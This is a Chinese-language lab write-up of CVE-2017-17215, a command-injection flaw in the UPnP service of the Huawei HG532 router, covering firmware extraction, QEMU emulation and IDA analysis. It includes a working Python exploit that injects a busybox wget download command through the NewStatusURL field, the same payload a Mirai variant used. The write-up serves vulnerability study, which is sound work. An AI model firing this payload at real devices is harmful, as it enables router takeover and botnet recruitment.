【我的第一个现实漏洞分析】 CVE-2017-17215 华为智能路由器HG532 漏洞分析笔记

0x00 基本信息

2017.11.27 Check Point团队报告华为 HG532 产品的远程命令执行漏洞(CVE-2017-17215)，Mirai的升级版变种中已经使用该漏洞。华为HG532 是一款小型家用和办公用户打造的告诉无线路由器。该漏洞payload由蜜罐所捕获发现。利用原理是利用upnp服务中的注入漏洞实现任意命令执行。

在Freebuf上有一系列文章，指导如何学习路由器漏洞分析，本文是第一篇通过CVE-2017-17215学习路由器漏洞分析，从入坑到放弃的复现记录，旨在供后来者验证和自我学习。

0x01 漏洞分析

该漏洞版本固件是HG532eV100R001C02B015_upgrade_main.bin。目前华为已发布漏洞公告，固件已经升级到HG532eV100R001C02B015_upgrade_main.bin。在华为的花粉论坛找到了该版本的下载链接。

click here to download

在这篇文章CVE-2017-17215-HG532命令注入漏洞分析中也找到了下载地址2。两篇文章可以对照看，Freebuf上的文章更为详细具体。

查看官方Payload

分析固件文件

分析环境是ububtu 16.04 ，用binwalk解压固件文件

binwalk -Me HG532eV100R001C02B015_upgrade_main.bin

根据CheckPoint报告，漏洞点位于UPnP服务中。执行下列命令。

cd _HG532eV100R001C02B015_upgrade_main.bin.extracted/

cd squashfs-root/

cd bin

file upnp

结果如下图所示：

可以看到upnp是MIPS 32位大端架构系统

0x02 分析环境搭建

环境搭建主要目的是搭建路由器固件运行的环境，有以下步骤：

安装QEMU 虚拟机
配置网络环境
加载路由器虚拟机的操作系统镜像

1. 安装qemu

在ubantu中执行下列指令

sudo apt-get install qemu

sudo apt-get install qemu-user-static

sudo apt-get install qemu-system

2. 网络配置

安装网络配置工具

apt-get install bridge-utils uml-utilities

修改ubuntu网络配置接口文件 /etc/network/interfaces/
修改qemu的网络接口启动文件脚本etc/qemu-ifup如下所示：
启动桥接网络

赋予可执行权限

sudo chmod a+x /etc/qemu-ifup

重启网络服务，使配置生效

sudo /etc/init.d/networking restart

关闭ens33，启动桥接网络br0

sudo ifdown eth0

sudo ifup br0

执行到这里时，系统提示eh0并未启动。这里并不影响

br0启动后如下所示

3. 加载debian镜像文件

结合Freebuf上的教程，下载debian mips qemu镜像文件，作为固件运行环境，下载地址如下：

https://people.debian.org/~aurel32/qemu/mips/

根据教程下载debian_squeeze_mips_standard.qcow2和vmlinux-2.6.32-5-4kc-malta。教程中作者吐槽其他的帖子有各种下载镜像的地址，但是坑很多。

然后在下载文件夹路径下，启动qemu，运行刚刚下载的镜像文件：

sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic,macaddr=00:16:3e:00:00:01 -net tap

一切顺利，可以看到qemu成功启动

在QEMU虚拟机中，用户名root,密码root成功登陆。

但是尝试ping BAIDU时，发现网络不通。

ifconfig -a发现了网络机接口是eht1：

敲入指令

nano /etc/network/interfaces

将接口文件中的eth0改为eth1，之后，再键入指令

ifup eth1

重启eth1,再次尝试ping www.baidu.com。此时ping通。

直接在qemu上操作比较麻烦，建议在ubantu上ssh root@虚拟机ip来操作虚拟机。

将之前解压的固件包拷贝到虚拟机中，即完成路由器固件运行环境的搭建。接下来开始漏洞的复现。固件拷贝命令如下：

scp -r ./squashfs-root  root@虚拟机ip:/root/

0x03 漏洞复现

本章解决三个问题。

第一：漏洞点在路由器的哪个服务中；

第二：如何运行漏洞点所在服务；

第三：如何利用

1. 定位漏洞点

首先查看checkpoint报告中的payload

注意其中的关键字：ctrlt和DeviceUpgrade_1，通过**grep -r [keywords]*指令查看有哪些文件包含这两个词语：

再找下端口号37215所在文件。

2. 运行漏洞点服务

但是要运行upnp和mic这两个文件，需要先切换根目录到路由器文件系统中，如果直接运行结果如下：

切换到路由器文件系统指令：

chroot /root/squashfs-root /bin/sh

或者执行qemu中squashfs-root文件夹中执行

chroot . sh

达到切换固件跟录下的目的。结果如下图所示：

运行mic服务

3. 验证漏洞

这时测试一下路由器的37215端口，

在ubantu上键入指令sudo nc -vlp 80 监听本机80端口，接下来运行exp脚本验证漏洞。

0x04 EXP 脚本

根据披露的payload，构造EXP 脚本如下：

import requests

headers = {

    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"

}

data = '''<?xml version="1.0" ?>

 <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

  <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">

   <NewStatusURL>;/bin/busybox wget -g 98.168.241.128 -l /tmp/1 -r /1;</NewStatusURL>

   <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>

  </u:Upgrade>

 </s:Body>

</s:Envelope>

'''

requests.post('http://198.168.241.129:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

监听发现80端口收到路由器发来的wget包。

说明路由器成功执行exp中的wget指令。

0x04 漏洞原理

用IDA打开固件文件中的/bin/upnp文件。根据poc，注入点在<NewStatusURL>以及<NewDownloadURL>，在字符串中找到它们

双击NewStatusURL，按下X查看交叉引用

查看这部分代码

newstatusurl这个节点值为 <NewStatusURL>$(busybox wget -g xxxx ;xx;xx)</NewStatusURL>

snprintf(a0,0x400,"upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -",a3)

其中a0是被拷贝的字符串的地址，也是system调用的第一个参数，这意味着路由器会执行system(a0)指令，达到控制该路由器的目的。例如在本文的exp中，执行的是wget指令。

0x05 参考文章

[1] 通过CVE-2017-17215学习路由器漏洞分析，从入坑到放弃

[2] CVE-2017-17215 - 华为HG532命令注入漏洞分析

[3] CVE-2017-17215-HG532命令注入漏洞分析